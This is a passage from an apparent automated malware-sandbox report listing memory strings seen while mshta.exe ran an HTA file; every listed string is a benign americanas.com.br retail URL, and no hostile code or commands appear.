00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487177460.000000000AB31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404256581.000000000AB22000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-moveis?chave=dk_hm_dt_2_1_moveis
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-portateis?chave=dk_hm_dt_2_7_portateisW
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefonia
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/duvidas-marketplace?chave=footeracom_marketplace
Source: mshta.exe, 00000000.00000003.25392143865.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486282298.000000000A9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/duvidass-
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/electrolux
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/electrolux-refrigerador-dez-21
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460957598.000000000AC7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464533482.000000000AC80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465519624.000000000AC82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488496284.000000000AC82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/eletrodom-campanha?chave=dk_hm_dt_2_2_edom
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487832586.000000000ABBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/entregas?WT.mc_id=d_entrega_footer
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/guia-de-seguranca?chave=brd_hm_bt_0_footer_guiaseguranca
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460101803.000000000AC8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/ofertasdatv?chave=dk_hm_ats_2_5_ofertasdatv
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AA77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/oreo?chave=pc_home_ads_oreo-wandinha_menu
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/pepsico
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/politica-de-privacidade?chave=dk_hm_ft_00_05_privacidade
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/premio?chave=dk_hm_ft_00_02_premios
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487177460.000000000AB31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404256581.000000000AB22000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/regras-do-site?chave=dk_hm_ft_00_06_regras
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=dk_hm_branding_servicosK
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488181040.000000000AC1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/servicos/home?chave=prf_hm_0_tt_8_
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.0000000009473000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484186260.0000000009474000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465888443.000000000AAFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 